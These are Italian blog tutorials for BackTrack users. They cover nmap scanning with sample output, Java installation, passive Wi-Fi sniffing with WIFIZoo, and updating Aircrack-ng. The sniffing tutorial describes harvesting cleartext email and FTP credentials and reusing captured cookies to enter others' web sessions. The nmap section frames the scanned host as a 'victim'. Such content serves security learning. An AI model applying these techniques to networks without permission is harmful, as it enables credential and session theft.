Queste sono tutte opzioni che ricordo sono elencate , sezione per sezione , dal comando nmap -h.Una categoria che equipggia il nostro scanning di altre opzioni importanti è l HOST DISCOVERY , che ci mette al corrente di tutte le informazioni riguardanti gli host target , le opzioni sono 9 e prendiamo come esempio l’ opzione -sP , ovvero l’opzione del Ping Scan , che ci rileva tutti gli host che sno online , attivi.Dopo che si conoscono alcune delle opzioni , che sono ognuna specifica e determinata per ogni tipo di attacco o scanning , si può cominciare a vedere come ottimizzare la risposta in konsole dell’ nMap , ovvero come ottenere i risultati in maniera visibile , ovvero ancora la sezione delle opzioni detta di OUTPUT dell’ nMap….A cosa può esserci utile una determinata opzione di output rispetto ad un’altra oppure al non usarle? Le opzioni di output , già dalla parola , non riguardano lo scanning e le sue tecniche , ma solo l’output , e quindi il modo in cui il nostro tool ci informa della scansione e dei suoi risultati , ma facciamo anche quì un esempio apponendo alla nostra riga di comando l’ opzione -v , ovvero rendiamo verbose l’ output dell’nMap:
***
brigante ~HaCkLaB.WiFu # nmap -v 29.XXX.6.XX
Starting Nmap 4.50 ( http://insecure.org ) at 2008-02-10 21:40 GMT
Initiating ARP Ping Scan at 21:40
Scanning 29.XXX.6.XX [1 port]
Completed ARP Ping Scan at 21:40, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:40
Completed Parallel DNS resolution of 1 host. at 21:40, 0.15s elapsed
Initiating SYN Stealth Scan at 21:40
Scanning 29.XXX.6.XX [1711 ports]
Discovered open port 135/tcp on 29.XXX.6.XX
Discovered open port 139/tcp on 29.XXX.6.XX
Completed SYN Stealth Scan at 21:40, 4.53s elapsed (1711 total ports)
Host 29.XXX.6.XX appears to be up … good.
Interesting ports on 29.XXX.6.XX:
Not shown: 1709 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
MAC Address: 00:02:72:61:7B:52 (CC&C Technologies)
Read data files from: /usr/local/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 4.864 seconds
Raw packets sent: 1724 (75.854KB) | Rcvd: 1716 (68.650KB)

***

Ora la grande quantità di informazioni ottenute , non è data dalla maggiore o più approfondita scansione , ma solo dal fatto che l’ nMap ci ha restituito il risultato dello scanning in maniera Live , e cioé ci h restituito un risultato appena lo ha trovato , in modalità verbose.

La modalità verbose , proprio come le altre , può essere aggiunta tutte le volte che noi la richiediamo , un esempio può essere il seguente dove la uso assuieme all’ opzione -sV , che mi restituirà lo scanning delle porte TCP e , qualora ce ne fossero aperte , lo farà associando ad ogni porta il software per il quale la porta è in uso e la versione dello stesso…

***

brigante ~HaCkLaB.WiFu # nmap -v -sV 29.XXX.6.XX

Starting Nmap 4.50 ( http://insecure.org ) at 2008-02-13 22:18 GMT
Initiating ARP Ping Scan at 22:18
Scanning 29.XXX.6.XX [1 port]
Completed ARP Ping Scan at 22:18, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:18
Completed Parallel DNS resolution of 1 host. at 22:18, 0.09s elapsed
Initiating SYN Stealth Scan at 22:18
Scanning 29.230.6.73 [1711 ports]
Discovered open port 902/tcp on
29.XXX.6.XX
Discovered open port 2049/tcp on 29.XXX.6.XX
Discovered open port 445/tcp on 29.XXX.6.XX
Discovered open port 631/tcp on 29.XXX.6.XX
Discovered open port 139/tcp on 29.XXX.6.XX
Discovered open port 4662/tcp on 29.XXX.6.XX
Discovered open port 111/tcp on 29.XXX.6.XX
Discovered open port 5900/tcp on 29.XXX.6.XX
Completed SYN Stealth Scan at 22:18, 2.21s elapsed (1711 total ports)
Initiating Service scan at 22:18
Scanning 8 services on
29.XXX.6.XX
Completed Service scan at 22:19, 56.52s elapsed (8 services on 1 host)
Initiating RPCGrind Scan against
29.XXX.6.XX at 22:19
Completed RPCGrind Scan against
29.XXX.6.XX at 22:19, 0.02s elapsed (2 ports)
SCRIPT ENGINE: Initiating script scanning.
Initiating SCRIPT ENGINE at 22:19
Completed SCRIPT ENGINE at 22:19, 0.43s elapsed
Host
29.XXX.6.XX appears to be up … good.
Interesting ports on
29.XXX.6.XX
Not shown: 1703 closed ports
PORT STATE SERVICE VERSION
111/tcp open rpcbind 2 (rpc #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: HACKLAB-WG)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: HACKLAB-WG)
631/tcp open ipp CUPS 1.2
902/tcp open ssl/vmware-auth VMware GSX Authentication Daemon 1.10 (Uses VNC)
2049/tcp open nfs 2-4 (rpc #100003)
4662/tcp open edonkey?
5900/tcp open vnc VNC (protocol 3.7)
MAC Address: 00:13:8F:EB:1D:DD (Asiarock Incorporation)

Host script results:
|_ Discover OS Version over NetBIOS and SMB: Unix

Read data files from: /usr/local/share/nmap
Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.804 seconds
Raw packets sent: 1762 (77.526KB) | Rcvd: 1712 (78.748KB)


Un’ altra opzione della serie OUTPUT può essere quella che ci permette di avere la risposta , il risultato dello scanning , in un file di testo che conterrà tutto il risultato dello scanning e che potremo di conseguenza consultare ogni volta che ne avremo bisogno , perché se ad esempio abbiamo una vittima precisa , possono a seconda del caso cambiare le porte aperte , ma l’ OS vittima raramente può cambiare e quindi sarà un informazione che sarà sempre in nostro possesso , perché appunto nel file di testo salvato dall’ nMap.

esempio:

nmap -v 29.XXX.6.XX > brigante.txt

l’nMap in questo caso eseguirà lo scanning dell’ IP inb maniera invisibile , (se così possiamo dire), e tutto il risultato verrà salvatonel file di testo chiamato da noi brigante.txt ed automaticamente salvato in /root

Potete dalle informazioni sopra descritte capire l’ importanza di un tool come l’ nMap , è praticamente essenziale ad ogni occasione , e data la sua natura leggera , multipiattaforma , semplice e soprattutto opensource è praticamente essenziale ed irrinunciabile.

per una descrizione accurata , anche se in inglese , potete sempre recarvi sul sito ufficiale di insecure.org dove troverete tutte le opzioni , una ad una , con relativa descrizione…

Quì di seguito vi mostro un’ immagine dell’interfaccia grafica di cui l’ nMap gode in BackTrack
nmap1.png

Tramite l’interfaccia grafica , ovvero l’ nMapFE , è possibile effettuare tutte le operazioni che possono essere fatte con la konsole , ovviamente si hanno i privilegi e gli inconvenienti che una GUI può avere a confronto di un uso tramite riga di comando , ma il tool ha dato prova anche nei casi sopra descritti di grande stabilità.Le opzioni dell’ nMapFE vanno settate tramite 5 linguette , poste in alto nella finestra , subito sotto la casella dove andremo ad inserie la stringa contenente l’indirizzo IP del nostro target e nelle varie linguette possiamo selezionare , sezione per sezione tutte le opzioni , tutte le nostre scelte che facciamo , possiamo controllarle ,(proprio come per l’ Hydra-Gtk ) , tramite la riga di caratteri posti nella parte bassa della finestra.Dire altro sull’ nMap , significherebbe dover stare quì ad elencare tutte le opzioni possibili ed immaginabili , vi ho più volte ripetuto che basta dare il comando nmap -h , da konsole che vi verranno elencate tutte le opzioni sezione per sezione quindi chi vuole oltre che recarsi al sito di insecure.org , può studiarsi il tool dal proprio pc.Lo consiglio vivamente , anche se personalmente ho imparato molto sull’ nMap proprio facendo gli scanning , notando le differenze e provando sempre opzioni nuove.

Ciao a tutti e alla prossima.

nmapbnrmatrixiainqz0.gif

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

JDK and Java-support for Firefox

images.jpeg

Ciao a tutti,

scrivo questo piccolo tutorial perché anche volendo non si può fare a meno di avere Java in un sistema operativo che si rispetti , ed ora che la BackTrack si mostra semprepiù nella sua forma stabile di sistema operativo al top degli O.S. non solo riguardo la sicurezza ho quindi deciso di scrivere un piccolo tutorial su come installare in BackTrack il Java developpment pakage e il supporto Java per Firefox.

Io uso il Java per avere a disposizione una serie di strumenti come il WebGost , ottimo per apprendere la tecnica di intrusione dell’ SQL-Injection , (di cui ho già scritto quì), ma una volta installato il Java ci permette di fare molte cose tra cui ad esempio la compilazione di programmi e altro.

La procedura che andrò a descrivere è una semplice installazione , ma se scrivo questo tutorial è più che altro per installare il supporto Java in Firefox

Iniziamo , ma prima chiedo a tutti di controllare la data di questo tutorial che potrebbe fare in modo da farvi scaricare un pacchetto di Java ad una versionbe successiva , rispetto a quella usata in questo tutorial.

Cominciamo con lo scaricarci il pacchetto in *.mo dai repository di Slax.org , da quest’ indirizzo.

Successivamente , appena scaricato nella vostra /root il pacchetto da konsole convertitelo ed installatelo con i seguenti comandi:

mo2lzm Java_2_JDK_1_5_0_006.mo JDK-2.lzm

lzm2dir JDK-2.lzm

Ora che abbiamo la nostra JDK installata sulla nostra BackTrack , procediamo con il passo successivo , e cioé installare Java per Firefox.

Innanzitutto scaricatevi dal sito di Java Sun l’ ultima versione dei binari disponibili a quest’ indirizzo.

e posizionate il file sul vostro Desktop.

Ora creiamoci una directory per java in /opt , e quindi da konsole date il comando:

cd /opt

e successivamente , dopo essere entrati in /opt:

mkdir java

ora , una volta creata la directory per java , procediamo con il copiare il file scaricato nella cartella java:

cp /root/Desktop/jre-6u3-linux-i586.bin /opt/java

Una volta copiato il file nella directory appositamente creata , installiamo il tutto con i seguenti passi:

entrate nella directory con:

cd java

controllate l’esistente al suo interno con:

ls

di seguito…:

chmod a+x jre-6u3-linux-i586.bin

Elenchiamo i files con:

ls -l

e quindi installiamo java con:

./jre-6u3-linux-i586.bin

per prima cosa vi verrà elencata la licenza di java , a cui dovrete rispodere sì:

yes

ora un controllo finale con:

ls

e siamo a posto , java è installato nel nostro sistema.

Procediamo ora con l’installazione di java nelle directory di Firefox , dando sempre da konsole i comandi:

cd /usr/lib/firefox/plugins

ln -s /opt/java/jre1.6.0_03/plugin/i386/ns7/libjavaplugin_oji.so

Ora vi basterà andare in Firefox–>Preferenze ed abilitare Java.

Un piccolo tip per avere anche in backtrack tutto quello che ci serve…

ciao a tutti e alla prossima.

802.11 sniffing con WIFIZoo

 

Nonostante le più recenti misure di sicurezza adottate dal protocollo 802.11 si siano rilevate abbastanza solide, ancora oggi utenti sprovveduti lasciano aperta la propria rete, rendendola indifesa davanti al tentativo di accesso da parte di chiunque sia nel raggio dell’Access Point. Ma avere della banda occupata da qualcuno non autorizzato, per certi versi, non è il rischio più alto.

Se la rete WiFi che utilizziamo non adotta nessun tipo di crittografia dei dati significa che qualunque dato trasmesso è in chiaro; quindi, a meno che non stiamo utilizzando una protezione di livello più alto (es. SSH), ogni dato intercettato è leggibile da chiunque ne sia in possesso. L’attività di intercettazione passiva dei dati che transitano in una rete telematica (Wikipedia) è chiamata sniffing.

BackTrack 3 mette a disposizione vari tool che consentono di fare sniffing, uno di questi è WIFIZoo, sviluppato da Hernan Ochoa.

WIFIZoo permette di catturare passivamente informazioni passanti su una rete non protetta in maniera del tutto automatica, inoltre è dotato di un’interfaccia grafica molto intuitiva, anche di un sistema di logging del traffico e un proxy integrato. Lo sniffer legge tra i pacchetti catturati dalla scheda wireless per carpirne quanti più dati “sensibili” presenti al loro interno; permette di recuperare facilmente tutti quei dati che per loro natura passano in chiaro sulla rete. Oltre a sniffare i pacchetti in chiaro su connessioni WiFi non protette WIFIZoo crea anche dei piccolo grafici che mostrano BSSID e client ad essi associati.

Prima di poter procedere con un piccolo test sulla nostra rete dobbiamo configurare WIFIZoo in modo corretto, seguite questo piccolo tutorial per aggiornarlo e configurarlo correttamente.

Visto che proviamo il programma su una rete di nostra proprietà usiamo Airodump-ng per bloccare la nostra scheda di rete in ascolto su un canale specifico, quindi apriamo un terminale e digitiamo:

———–
airmon-ng start wifi0 11
airodump-ng –channel 11 ath0
———–

in questo modo la nostra scheda è in ascolto solo sul canale di trasmissione della nostra rete, questo eviterà di intercettare per sbaglio comunicazioni che arrivano da reti non in nostro possesso. Adesso avviamo WIFIZoo sempre da terminale:

———–
cd /pentest/wireless/wifizoo
python wifizoo.py -i ath0
———–

e creiamo del traffico con un client connesso alla nostra rete; quindi aprimo un browser qualunque e digitiamo nella barra degli indirizzi:

———–
http://127.0.0.1:8000
———–

Se WIFIZoo è configurato ed installato correttamente dovreste vedere l’interfaccia web di WIFIZoo che ha il compito di riassumere a grandi linee i dati catturati.
Analizziamo le voci presenti in questa interfaccia una ad una:

[General info]
SSIDS (AP) List
Mostra la lista degli AP rilevati comprensiva di MAC address, numero di client connessi e casa produttrice; la pagina è dotata di refresh automatico e se cliccate sul MAC di un AP apparirà la lista dei client ad esso connessi.

BSSID->Clients Graph
Questa finestra vi mostra un grafico che raffigura a quali AP sono collegati i client, se un client dovesse passare da un AP a un’altro lo dovreste vedere.

Probes Graph
Anche in questa finestra è mostrato un grafico, ma questa volta rappresenta le probes request di Ap verso i client.

SSIDS Obtained from ProbeRequests
Analoga alla finestra successiva ma mostra gli i nomi SSID ottenuti dalle richieste effettuate dai client verso gli AP

Stats
E’ un riassunto generale dei dati sniffati, comprende il numero dei pacchetti catturati divisi per porta e protocollo.

[Captured Data]
POP3 Credentials
Raccoglie le informazioni su credenziali raccolte sul protocollo POP (email)

Cookies
Questa è una delle finestre più interessanti, infatti presenta una dettagliata didascalia di tutti i cookies sniffati da sessioni HTTP. I cookies sono mostrati sotto forma di link, seguendo questi link si passa dal proxy di WIFIZoo che li setta in automatico e vi reindirizza alla pagina web a cui il cookie fa riferimento.

FTP Data e SMTP Data
Queste due finestre sono analoghe alla finestra “POP3 Credentials”, solo che mostrano informazioni in chiaro dei protocolli SMTP e FTP.

Oltre all’interfaccia di gestione via browser all’interno della cartella dove risiede wifizoo.py, c’è una directory chiamata “logs” dove vengono memorizzati tutti i log dello sniffing effettuato da WIFIZoo.

Concludo ricordandovi che se doveste usare questo programma su reti non di vostra proprietà commettereste un reato.

Aircrack-ng & WIFIZoo update

helpdesk.jpg

Ciao a tutti,

questo breve tutorial spiega come aggiornare alle versioni più recenti 2 tool in vostro possesso con l’utilizzo di BackTrack 3:

  • la suite di tools Aircrack-NG
  • lo sniffer WIFIZoo

[#][#]Aircrack-NG
L’attuale versione installata in BT3 di Aircrack-ng è la 1.0-beta1; noi in questo tutorial vedremo come passare dalla 1.0-beta1 alla 1.0-beta2 lasciando inalterato il supporto per SQLite, cosi da poter ancora utilizzare Airolib-ng per la creazione di database. Tra le varie novità proposte dalla versione 1.0-beta2 si può notare con piacere che gli sviluppatori di questo magnifico tool hanno ridotto a 2 i pacchetti necessari al cracking della chiave WPA (prima occorreva catturare tutti e 4 i passaggi dell’handshake); comunque vi rimando alla pagina contente il changelog della versione 1.0-beta2 per dettagli più accurati sul lavoro svolto dagli sviluppatori di Aircrack-ng.
Vi ricordo che le informazioni su come aggiornare Aircrack-ng sono presenti anche sul suo wiki.
Prima di iniziare creiamo una directory dalla quale lavoreremo:

———
cd /root
mkdir update
cd update
———

ora scarichiamo con wget l’archivio contenente il codice di Aircrack-ng e scompattiamolo:

———
wget http://download.aircrack-ng.org/aircrack-ng-1.0-beta2.tar.gz
tar -zxvf aircrack-ng-1.0-beta2.tar.gz
———

Non ci rimane che entrare nella directory creata scompattando Aircrack-ng per compilarlo ed installarlo con il supporto per Airolib-ng:

———
cd aircrack-ng-1.0-beta2
make sqlite=true
make sqlite=true install
———

A questo punto abbiamo la versione 1.0-beta2 di Aircrack-ng compilata ed installata correttamente e funzionante!

[#][#]WIFIZoo
WIFIZoo è uno sniffer che lavora sul protocollo 802.11; è in grado di catturare e mostrare in tempo reale le informazioni pasanti sulle reti non protette come password POP, cookies etc.
La versione presente in BT3 è la 1.2, ma noi la aggiorneremo alla versione 1.3 che, a differenza della versione precedente, ha in più il supporto per leggere da un file del traffico catturato in precedenza (es. con Kismet o Airodump-ng).

Prima di tutto entriamo nella nostra cartella “update” se non ci siamo già:

———
cd /root/update
———

quindi scarichiamo la versione 1.3 di WIFIZoo:

———
wget http://community.corest.com/~hochoa/wifizoo/wifizoo_v1.3.tgz
———

sccompattiamo WIFIZoo e entriamo nella directory creata:

———
tar zxvf wifizoo_v1.3.tgz
cd wifizoo_v1.3
———

ora dobbiamo scaricare “scapy.py“, necessario al funzionamento del programma:

———
wget http://hg.secdev.org/scapy/raw-file/tip/scapy.py
———

WIFIZoo è scritto in Python che è gia installato in BT3, dobbiamo solo configurarlo affinchè riconosca la nostra interfaccia di rete, lo stesso vale per “scapy.py“.
Apriamo con un editor di testo il file “wifizoo.py” e modifichiamo la voce “conf.iface = ‘rausb0’” (linea 50) in modo che rispecchi la nostra configurazione, esempio avendo una scheda con chipset Atheros la linea in va cambiata inconf.iface = ‘ath0’“.
Adesso possiamo passare ad editare “scapy.py“, quindi apriamo il file con un editor testuale e modifichiamo la linea 13270 inserendo al posto di “betteriface” una riga simile a quella che inseriamo in Kismet nella voce source, usando un chipset Atheros io ho modificato la linea in modo che diventiconf.iface = ‘madwifing_g,ath0,madwifi’“.

Adesso che WIFIZoo è configurato non ci resta che sostituirlo al precedente e creare al suo interno la directory dove verranno salvati i logs ad ogni suo utilizzo, quindi:

———
rm -r /pentest/wireless/wifizoo/*
cp -r * /pentest/wireless/wifizoo
mkdir /pentest/wireless/wifizoo/logs
———

Prima di testare WIFIZoo installeremo Graphviz, questo tool permetterà a WIFIZoo di creare dei grafici che mettano in relazione BSSID con i client ad essi associati:

———
wget http://www.graphviz.org/pub/graphviz/ARCHIVE/graphviz-working.tar.gz
tar zxvf graphviz-working.tar.gz
cd graphviz-2.16.1/
———

durante l’installazione ho avuto dei problemi con le librerie grafiche, cosi cercando sul forum di Remote-Exploit.org ho trovato la soluzione ai miei problemi seguendo il post di KMDave, in pratica dobbiamo creare un collegamente al file “gdkconfig.h” prima di procedere con la normale procedura di installazione da sorgenti, quindi:

———
ln -s /usr/lib/gtk-2.0/include/gdkconfig.h /usr/include
./configure
make
make install
———

A questo punto WIFIZoo è perfettamente funzionante, non dovete fare altro che recarvi dentro la directory di WIFIZoo e lanciarlo con:

———
python wifizoo.py -i atho
———

dove “ath0” rappresenta la vostra interfaccia di rete settata in monitor mode.

Adesso che abbiamo finito il nostro lavoro eliminiamo la cartella “update” dalla nostra home:

———
cd /root
rm -r update
———

Spero di essere stato utile a qualcuno,
ciauz!